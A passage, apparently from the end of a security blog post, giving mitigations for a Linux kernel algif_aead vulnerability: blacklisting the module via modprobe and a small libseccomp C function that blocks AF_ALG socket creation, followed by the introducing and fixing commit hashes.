echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null || true

This does not affect dm-crypt/LUKS, kTLS, IPsec/XFRM, OpenSSL,
GnuTLS, SSH, or any in-kernel crypto user. Those go through the kernel
crypto API directly without AF_ALG. For containers and CI
systems, also block AF_ALG socket creation via seccomp.
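For the seccomp route, here is a minimal libseccomp sketch of mine (assumes libseccomp is installed; link with -lseccomp) that makes socket(AF_ALG, ...) fail with EPERM while leaving everything else alone:

#include <errno.h>
#include <seccomp.h>
#include <sys/socket.h>

/* Install a filter that denies creation of AF_ALG sockets.
 * Apply before spawning the workload (container init, CI runner). */
int deny_af_alg(void)
{
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW); /* default: allow */
    if (!ctx)
        return -1;

    /* socket(domain, type, protocol): match domain == AF_ALG (38) */
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(socket), 1,
                     SCMP_A0(SCMP_CMP_EQ, AF_ALG));

    int rc = seccomp_load(ctx);
    seccomp_release(ctx);
    return rc;
}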
- 72548b093ee3 - the 2017 in-place optimization (vulnerability introduction)
- a664bf3d603d - the fix

If you’ve got questions, feel free to hit me up on Twitter!